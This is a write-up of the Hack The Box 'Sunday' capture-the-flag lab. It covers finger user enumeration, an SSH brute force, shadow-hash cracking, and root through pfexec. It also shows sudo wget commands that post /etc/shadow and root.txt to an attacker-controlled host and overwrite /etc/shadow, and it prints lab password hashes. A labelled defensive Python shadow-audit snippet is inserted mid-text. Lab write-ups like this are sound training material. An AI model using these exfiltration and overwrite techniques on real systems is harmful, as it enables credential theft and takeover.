HTB – Sunday

Today we are going to solve another CTF challenge, “Sunday”. Sunday is a retired vulnerable lab presented by Hack The Box for practising online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: find user.txt and root.txt file in the victim’s machine.

Let’s start off with scanning the network to find our target.

c:\Users\jacco>nmap -p- -A 10.10.10.76 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-14 20:56 W. Europe Standard Time
Nmap scan report for 10.10.10.76
Host is up (0.022s latency).
Not shown: 63170 filtered ports, 2360 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
| finger: Login Name TTY Idle When Where\x0D
|_sunny sunny pts/2 6 Thu 19:03 10.10.14.20 \x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
61851/tcp open smserverd 1 (RPC #100155)
63175/tcp open unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/14%OT=79%CT=6%CU=42216%PV=Y%DS=2%DC=T%G=Y%TM=5C8AB26
OS:F%P=i686-pc-windows-windows)SEQ(SP=92%GCD=1%ISR=A3%TI=I%CI=I%II=I%SS=S%T
OS:S=7)SEQ(TI=I%CI=I%II=I%SS=S%TS=7)SEQ(CI=I%II=I)OPS(O1=NNT11M54DNW0NNS%O2
OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O
OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R
OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)

Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 37.00 ms 10.10.14.1
2 38.00 ms 10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds

Here we notice a very interesting result in the nmap scan: port 79 is open and running Sun Solaris fingerd. So I Googled for an exploit and found the Metasploit module “Finger Service User Enumerator”.

Then I loaded the Metasploit framework to identify valid users through the finger service, which this module does using a variety of tricks, and ran the following module.

Exploit

So, basically it revealed many usernames; now we make a dictionary of the obtained usernames and candidate passwords that will be helpful for an SSH login brute force.

Here we have used “patator” to launch a brute force against the SSH login on port 22022, executing the following command.

root@kali:~/htb/sunny# patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top15575.txt persistent=0
16:18:12 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-14 16:18 EDT
16:18:12 patator    INFO -                                                                              
16:18:12 patator    INFO - code  size    time | candidate                          |   num | mesg
16:18:12 patator    INFO - -----------------------------------------------------------------------------
16:18:13 patator    INFO - 1     22     0.253 | 123456                             |     1 | Authentication failed.
16:18:13 patator    INFO - 1     22     0.195 | 123456789                          |     3 | Authentication failed.
16:18:13 patator    INFO - 1     22     0.197 | password                           |     2 | Authentication failed.
16:18:14 patator    INFO - 1     22     0.194 | 12345                              |     5 | Authentication failed.
16:18:14 patator    INFO - 1     22     0.190 | qwerty                             |     6 | Authentication failed.
--snip--
16:18:17 patator    INFO - 1     22     0.220 | 654321                             |    14 | Authentication failed.
16:18:17 patator    INFO - 1     22     0.190 | superman                           |    23 | Authentication failed.
16:18:17 patator    INFO - 0     19     0.224 | sunday                             |    22 | SSH-2.0-Sun_SSH_1.3
16:18:17 patator    INFO - 1     22     0.220 | internet                           |    25 | Authentication failed.
16:18:18 patator    INFO - 1     22     0.201 | iloveyou                           |    26 | Authentication failed.
16:18:18 patator    INFO - 1     22     0.195 | michael                            |    24 | Authentication failed.
16:18:18 patator    INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 4 r/s, Time: 0h 0m 6s

Password:  sunday

But when we tried to log in to SSH with the above credentials, it gave a “no matching key exchange method found” error, printed a hint about the key-exchange methods the server offers, and dropped the connection.

After a little more research, I added the following key-exchange option to the SSH command and luckily obtained tty shell access.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022

sudo -l

Then I checked the sudo -l rights for user sunny and noticed he can run /root/troll as root without a password. Lol!! Executing /root/troll was a troll.

Further, I checked the available files and directories and luckily found shadow.backup inside the /backup directory.

Inside shadow.backup, I found hashes for users Sammy and Sunny.

PS C:\Users\jacco> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Password: sunday
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
sunny@sunday:~$ ls
Desktop Documents Downloads local.cshrc local.login local.profile Public
sunny@sunday:~$ cd /
sunny@sunday:/$ ls
backup boot dev etc home lib media net platform root sbin tmp var
bin cdrom devices export kernel lost+found mnt opt proc rpool system usr
sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/backup$

So we tried to crack these hashes with John the Ripper and fortunately obtained the plaintext password “cooldude!” for user sammy.

Privilege Escalation Techniques

The pfexec program is used to execute commands with the attributes specified by the user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh, pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell, respectively.

sunny@sunday:/root# find / -perm -u=s -type f 2>/dev/null
/usr/sbin/traceroute
/usr/sbin/pmconfig
/usr/sbin/deallocate
/usr/sbin/i86/whodo
/usr/sbin/allocate
/usr/xpg4/bin/crontab
/usr/xpg4/bin/at
/usr/bin/stclient
/usr/bin/sys-suspend
/usr/bin/rsh
/usr/bin/crontab
/usr/bin/rdist
/usr/bin/sudo
/usr/bin/lpset
/usr/bin/amd64/w
/usr/bin/amd64/uptime
/usr/bin/amd64/newtask
/usr/bin/chkey
/usr/bin/login
/usr/bin/pfexec
/usr/bin/newgrp

Now execute the following command to obtain a root-privileged shell.

sunny@sunday:/backup$ pfexec bash
sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)
sunny@sunday:/backup# cd /root
sunny@sunday:/root# cat root.txt
fb4*****9b8

Method 2

Now let’s switch from Sunny to Sammy and figure out the sudo permissions assigned to him.

sunny@sunday:/backup$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget

As we know that sudo permission is available for wget, we can use its --post-file option to send the contents of any file, for example /etc/passwd or /etc/shadow, to a listener we control.

Therefore we execute the following command to post the shadow file content to our local listening machine.

sunny@sunday:~# sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.20
--19:37:03-- http://10.10.14.20/
=> `index.html'
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 48158: NO_DATA
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.20
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 634

root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

From the output above, you can observe that we have obtained the hash value of the root user. You can either crack the hash value or modify it.

So we have copied the above content into a text file so that we can replace the hash value of user root with the hash value of user sunny.

Now download the modified shadow file to its original path, i.e. /etc/shadow, so that it overwrites the original shadow file.

sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
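As an added example (not part of the original write-up), here is a small Python audit a defender could run over two shadow snapshots to catch exactly the change Method 2 makes: it parses the Solaris shadow format, reports accounts added, removed or re-hashed, and flags any hash shared by two users, which is what replacing root's hash with sunny's produces. The sample entries are copied from the posted /etc/shadow above; the modified copy is constructed in the code.

```python
from collections import defaultdict

# Constructed sample: entries copied from the write-up's posted /etc/shadow.
ORIGINAL_SHADOW = """\
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
dladm:*LK*:::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""
# Constructed: the file the write-up uploads, root's hash swapped for sunny's.
SUNNY_HASH = "$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3"
MODIFIED_SHADOW = ORIGINAL_SHADOW.replace(
    "$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD", SUNNY_HASH)

def parse_shadow(text):
    """Map user -> password field; Solaris shadow lines have 9 colon fields.
    NP means no password set, *LK* means locked, $5$ is a SHA-256 crypt hash."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries[fields[0]] = fields[1]
    return entries

def audit(before_text, after_text):
    """List accounts added, removed or re-hashed, and hashes shared by users."""
    before, after = parse_shadow(before_text), parse_shadow(after_text)
    findings = []
    for user in sorted(set(before) | set(after)):
        if user not in before:
            findings.append(f"added: {user}")
        elif user not in after:
            findings.append(f"removed: {user}")
        elif before[user] != after[user]:
            findings.append(f"hash changed: {user}")
    # Identical hashes mean identical passwords; the root-hash swap above
    # produces exactly this pairing for root and sunny. NP/*LK* are skipped.
    by_hash = defaultdict(list)
    for user, field in after.items():
        if field.startswith("$5$"):
            by_hash[field].append(user)
    for users in by_hash.values():
        if len(users) > 1:
            findings.append("shared hash: " + ",".join(sorted(users)))
    return findings
```

Running audit(ORIGINAL_SHADOW, MODIFIED_SHADOW) reports both the changed root hash and the root/sunny pairing, which is the signal to look for in a backup-versus-live comparison.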

Method 3

Similarly, we can also post the content of the root.txt file directly to the listening machine.

sunny@sunday:~# sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.20
--19:45:30-- http://10.10.14.20/
=> `index.html'
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 35773: NO_DATA
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.20
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

fb4*****9b8